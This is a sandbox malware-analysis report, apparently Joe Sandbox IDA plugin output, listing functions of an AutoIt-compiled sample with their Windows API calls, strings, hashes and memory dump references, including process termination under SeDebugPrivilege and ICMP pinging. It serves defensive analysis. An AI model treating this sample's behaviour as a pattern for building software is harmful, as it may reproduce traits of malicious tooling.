_wcscmp.LIBCMT ref: 0008BB7E
GetWindowTextW.USER32(00000002,?,00000400), ref: 0008BBA5
GetClassNameW.USER32(00000018,?,00000400), ref: 0008BBEE
_wcscmp.LIBCMT ref: 0008BBFE
GetClassNameW.USER32(00000010,?,00000400), ref: 0008BC26
GetWindowRect.USER32(00000004,?), ref: 0008BC8F

Strings

@, xrefs: 0008BA92
ThumbnailClass, xrefs: 0008BB79, 0008BBF9

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: f90a7facc3e4401d2e63c05ec4259ad60ba2b137017a65bc1ea65dd7559ab210
Instruction ID: c5d6fb88e470e76f68b6e347abac97a3e4e25cf2cd10d68d93396bcaf88bb0bf
Opcode Fuzzy Hash: f90a7facc3e4401d2e63c05ec4259ad60ba2b137017a65bc1ea65dd7559ab210
Instruction Fuzzy Hash: DD81AF710083099BDB54EF14C885FAA7BE8FF44314F048569FDC99A096EB74ED49CB61

Function 000333E7 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 72
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00033444
RegisterClassExW.USER32(00000030), ref: 0003346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0003347F
InitCommonControlsEx.COMCTL32(?), ref: 0003349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000334AC
LoadIconW.USER32(000000A9), ref: 000334C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000334D1

Strings

AutoIt v3 GUI, xrefs: 00033460
TaskbarCreated, xrefs: 00033474
+, xrefs: 0003342D
0, xrefs: 00033426

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: bed41c3f4d31488a35fb6cdb79c0be47fe214828f326f8e2a744da3afa986826
Instruction ID: 5ed245dc6bdb56ec7ef52ef029dcd1bc03fa815b46c8be4302f532e66ebe06b1
Opcode Fuzzy Hash: bed41c3f4d31488a35fb6cdb79c0be47fe214828f326f8e2a744da3afa986826
Instruction Fuzzy Hash: 39314771845309EFEB418FA4DC88BD9BBF0FB09310F10455AE584E62A0D7B90596DF52

Function 00033411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00033444
RegisterClassExW.USER32(00000030), ref: 0003346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0003347F
InitCommonControlsEx.COMCTL32(?), ref: 0003349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000334AC
LoadIconW.USER32(000000A9), ref: 000334C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000334D1

Strings

AutoIt v3 GUI, xrefs: 00033460
TaskbarCreated, xrefs: 00033474
+, xrefs: 0003342D
0, xrefs: 00033426

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: b612e2587241490058c73d3f8ea0a9c2b756e251705e04450695e4211540d777
Instruction ID: bda3fea34b7c571c42406a02f31fc1d931f8c56a68ef703601b5060de969a005
Opcode Fuzzy Hash: b612e2587241490058c73d3f8ea0a9c2b756e251705e04450695e4211540d777
Instruction Fuzzy Hash: 3C21E5B1D44308EFEB009FA4EC89B9DBBF4FB08710F10411AF514A62A0D7B91545DF92

Function 00042FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000500CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00043094), ref: 000500ED

Part of subcall function 000508C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,0004309F), ref: 000508E3

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 000430E2
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 000801BA
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 000801FB
RegCloseKey.ADVAPI32(?), ref: 00080239
_wcscat.LIBCMT ref: 00080292

Strings

\Include\, xrefs: 0004309F
Include, xrefs: 000801B1, 000801F2
Software\AutoIt v3\AutoIt, xrefs: 000430D8
\, xrefs: 000802B5

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 849f11d70c07fcbdd201a853e46ddd83ae3c798c01002696fcab9a9e9030bf74
Instruction ID: 4ed8c9349c6b4b2358174bfa57b771e0a4c802f8e9dffb95269d8c5c9dc6239d
Opcode Fuzzy Hash: 849f11d70c07fcbdd201a853e46ddd83ae3c798c01002696fcab9a9e9030bf74
Instruction Fuzzy Hash: C6719CB15093019AD784EF24E8819EFBBE8FF89310F40452EF585832A1EF74A948DB56

Function 0004514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00045156
LoadCursorW.USER32(00000000,00007F00), ref: 00045165
LoadIconW.USER32(00000063), ref: 0004517C
LoadIconW.USER32(000000A4), ref: 0004518E
LoadIconW.USER32(000000A2), ref: 000451A0
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000451C6
RegisterClassExW.USER32(?), ref: 0004521C

Part of subcall function 00033411: GetSysColorBrush.USER32(0000000F), ref: 00033444
Part of subcall function 00033411: RegisterClassExW.USER32(00000030), ref: 0003346E
Part of subcall function 00033411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0003347F
Part of subcall function 00033411: InitCommonControlsEx.COMCTL32(?), ref: 0003349C
Part of subcall function 00033411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000334AC
Part of subcall function 00033411: LoadIconW.USER32(000000A9), ref: 000334C2
Part of subcall function 00033411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000334D1

Strings

0, xrefs: 000451FA
AutoIt v3, xrefs: 0004520B
#, xrefs: 00045201

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 3384b05136e531173714c4e71752d865d4849859048c2c9e5d4e1a0919f61ff6
Instruction ID: fece9a3a7ebc408d2e9a4ae241a24f726397c1b71ad4d676c7783a8f6fa8623f
Opcode Fuzzy Hash: 3384b05136e531173714c4e71752d865d4849859048c2c9e5d4e1a0919f61ff6
Instruction Fuzzy Hash: 94213970D08308EBFB559FA4ED09BAD7FB4FB08321F004119F508A66A1D7B95550EF85

Function 000A5E1D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000101,?), ref: 000A5E7E
inet_addr.WSOCK32(?,?,?), ref: 000A5EC3
gethostbyname.WS2_32(?), ref: 000A5ECF
IcmpCreateFile.IPHLPAPI ref: 000A5EDD
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 000A5F4D
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 000A5F63
IcmpCloseHandle.IPHLPAPI(00000000), ref: 000A5FD8
WSACleanup.WSOCK32 ref: 000A5FDE

Strings

Ping, xrefs: 000A5F01

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 9a92f09c43e94e6e1af60487ec11c5e6947c122b4d3712cbe54beae6e25efbb6
Instruction ID: 10db87df1c82ec7bbc1e10deadbd003bfc912a2c0ba70c1af29d7749a0fb7f61
Opcode Fuzzy Hash: 9a92f09c43e94e6e1af60487ec11c5e6947c122b4d3712cbe54beae6e25efbb6
Instruction Fuzzy Hash: 2D519A316046009FDB20EF64CC89F6AB7E4BF49711F144929F999DB2A2DB74ED00CB42

Function 00044D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00044E22
KillTimer.USER32(?,00000001), ref: 00044E4C
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00044E6F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00044E7A
CreatePopupMenu.USER32 ref: 00044E8E
PostQuitMessage.USER32(00000000), ref: 00044EAF

Strings

TaskbarCreated, xrefs: 00044E75

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 874edad56cd86f6b15b2447c929bf0f8a3d30f71e7bbfb0de313b2d041592671
Instruction ID: 7ed1a17b77dbf4edb36df470f88a6f0fb71a829d1009af1db902cdd49d796142
Opcode Fuzzy Hash: 874edad56cd86f6b15b2447c929bf0f8a3d30f71e7bbfb0de313b2d041592671
Instruction Fuzzy Hash: 4E4129B164820AABFBA56F24DC0DBBE36D9F750301F000235F646925A2CB799C51F76B

Function 0003AD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0003ADE1
OleUninitialize.OLE32(?,00000000), ref: 0003AE80
UnregisterHotKey.USER32(?), ref: 0003AFD7
DestroyWindow.USER32(?), ref: 00072F64
FreeLibrary.KERNEL32(?), ref: 00072FC9
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00072FF6

Strings

close all, xrefs: 0003ADDC

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: ccd1a589f3a0290e2cc5ea8eb07b97c2ad8c6c5556f196aff171f6d421a47c28
Instruction ID: 52267d5c1707ba3c34383583b0719f0f6a692f52a7af8a903ca5b35139146e15
Opcode Fuzzy Hash: ccd1a589f3a0290e2cc5ea8eb07b97c2ad8c6c5556f196aff171f6d421a47c28
Instruction Fuzzy Hash: 6AA17070B01212CFDB69EF54C495B6DF3A4BF05700F1482ADE84AAB252CB35AD16CF95

Function 000456F8 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00080C5B

Part of subcall function 00041821: _memmove.LIBCMT ref: 0004185B

_memset.LIBCMT ref: 00045787
_wcscpy.LIBCMT ref: 000457DB
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000457EB
__swprintf.LIBCMT ref: 00080CD1

Strings

AutoIt - , xrefs: 00045760
E*E*, xrefs: 00080C95, 00080C9E, 00080CA9, 00080CB7, 00080CA2, 00080CAD
Line %d: , xrefs: 00080CCB

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
String ID: Line %d: $AutoIt - $E*E*
API String ID: 230667853-948538831
Opcode ID: bd42895f238c93208c54cbf62efe3d75aa72abf5c3b4210428c193311688eb90
Instruction ID: 47f8ee0c50ac550803f4a944f6bb4256e2f39caef9963bd623d9ec599a521db6
Opcode Fuzzy Hash: bd42895f238c93208c54cbf62efe3d75aa72abf5c3b4210428c193311688eb90
Instruction Fuzzy Hash: 434183B1408304ABD761EB64DC85AEF77ECAF44354F10063EF589920A3DB74A649C79B

Function 000AF01C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00094148: CreateToolhelp32Snapshot.KERNEL32 ref: 0009416D
Part of subcall function 00094148: Process32FirstW.KERNEL32(00000000,?), ref: 0009417B
Part of subcall function 00094148: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00094245

OpenProcess.KERNEL32(00000001,00000000,?), ref: 000AF08D
GetLastError.KERNEL32 ref: 000AF0A0
OpenProcess.KERNEL32(00000001,00000000,?), ref: 000AF0CF
TerminateProcess.KERNEL32(00000000,00000000), ref: 000AF14C
GetLastError.KERNEL32(00000000), ref: 000AF157
CloseHandle.KERNEL32(00000000), ref: 000AF18C

Strings

SeDebugPrivilege, xrefs: 000AF0AB

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 1701285019-2896544425
Opcode ID: 2773c7933810128674761e9ce52a3add46c6a925fa10c4b7c0b0c4866e0f3462
Instruction ID: 711d8647aabc85bd93849af2e2d1d01a50b4823fac107ab3b5a64667ba032500
Opcode Fuzzy Hash: 2773c7933810128674761e9ce52a3add46c6a925fa10c4b7c0b0c4866e0f3462
Instruction Fuzzy Hash: 5841BB702002029FDB21EFA4CC95FBDB7A5AF80714F188428F9469F293CBB4AD05CB85

Function 00045D13 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00045D40

Part of subcall function 00041821: _memmove.LIBCMT ref: 0004185B

GetCurrentProcess.KERNEL32(?,000C0A18,00000000,00000000,?), ref: 00045E07
IsWow64Process.KERNEL32(00000000), ref: 00045E0E
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00045E54
FreeLibrary.KERNEL32(00000000), ref: 00045E5F
GetSystemInfo.KERNEL32(00000000), ref: 00045E90
GetSystemInfo.KERNEL32(00000000), ref: 00045E9C

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: e79d8b807b68338c0f2f8250e205f8665972421970eec663b65a8de9951eb69d
Instruction ID: f187e5475d9516e5b0360b3782eb1725c019881837ba0266ef85f6f2eef16470
Opcode Fuzzy Hash: e79d8b807b68338c0f2f8250e205f8665972421970eec663b65a8de9951eb69d
Instruction Fuzzy Hash: EA91F371549BC0DFC775DB7888504AEFFE56F2A301B884AAED0C783A42D234A648C75E

Function 00059D16 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00059D16

Part of subcall function 000533B7: EncodePointer.KERNEL32(00000000), ref: 000533BA
Part of subcall function 000533B7: __initp_misc_winsig.LIBCMT ref: 000533D5
Part of subcall function 000533B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0005A0D0
Part of subcall function 000533B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0005A0E4
Part of subcall function 000533B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0005A0F7
Part of subcall function 000533B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0005A10A
Part of subcall function 000533B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0005A11D
Part of subcall function 000533B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0005A130
Part of subcall function 000533B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0005A143
Part of subcall function 000533B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0005A156
Part of subcall function 000533B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0005A169
Part of subcall function 000533B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0005A17C
Part of subcall function 000533B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0005A18F
Part of subcall function 000533B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0005A1A2
Part of subcall function 000533B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0005A1B5
Part of subcall function 000533B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0005A1C8
Part of subcall function 000533B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0005A1DB
Part of subcall function 000533B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0005A1EE

__mtinitlocks.LIBCMT ref: 00059D1B
__mtterm.LIBCMT ref: 00059D24

Part of subcall function 00059D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00059D29,00057EFD,000ECD38,00000014), ref: 00059E86
Part of subcall function 00059D8C: _free.LIBCMT ref: 00059E8D
Part of subcall function 00059D8C: DeleteCriticalSection.KERNEL32(000F0C00,?,?,00059D29,00057EFD,000ECD38,00000014), ref: 00059EAF

__calloc_crt.LIBCMT ref: 00059D49
__initptd.LIBCMT ref: 00059D6B
GetCurrentThreadId.KERNEL32 ref: 00059D72

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: bab0df48c7c1af4fd30e9d077d7157f76d537000a3a9d7c263bfbcb0948a9057
Instruction ID: 3365fdfbad8c210d5f54953fa14cd26a2710d948fcfbc93574c77a414c909097
Opcode Fuzzy Hash: bab0df48c7c1af4fd30e9d077d7157f76d537000a3a9d7c263bfbcb0948a9057
Instruction Fuzzy Hash: 10F06D32619712DAFB747B74BC036DB6AE4DB41772F204729FC50D50D3EF10890982A1

Function 000450DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00045109
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0004512A
ShowWindow.USER32(00000000), ref: 0004513E
ShowWindow.USER32(00000000), ref: 00045147

Strings

AutoIt v3, xrefs: 00045101, 00045106, 00045107
edit, xrefs: 00045124

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: c4e6d5ac7e0fa384de9deef380ab642ae6e32e728f4d8885d2f571caa06becc5
Instruction ID: 2ccfc5c54116fd68ba471b92784cdb782c5b9db36c75fe1f8055875d8fbe72c4
Opcode Fuzzy Hash: c4e6d5ac7e0fa384de9deef380ab642ae6e32e728f4d8885d2f571caa06becc5
Instruction Fuzzy Hash: B3F0B771945294BAFA711727AC48E3B3E7DD7C6F50F00011EB908A65A0C6691851EAB1

Function 00099B16 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00044A8C: _fseek.LIBCMT ref: 00044AA4

Part of subcall function 00099CF1: _wcscmp.LIBCMT ref: 00099DE1
Part of subcall function 00099CF1: _wcscmp.LIBCMT ref: 00099DF4

_free.LIBCMT ref: 00099C5F
_free.LIBCMT ref: 00099C66
_free.LIBCMT ref: 00099CD1

Part of subcall function 00052F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00059C54,00000000,00058D5D,000559C3), ref: 00052F99
Part of subcall function 00052F85: GetLastError.KERNEL32(00000000,?,00059C54,00000000,00058D5D,000559C3), ref: 00052FAB

_free.LIBCMT ref: 00099CD9

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00099B8F

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

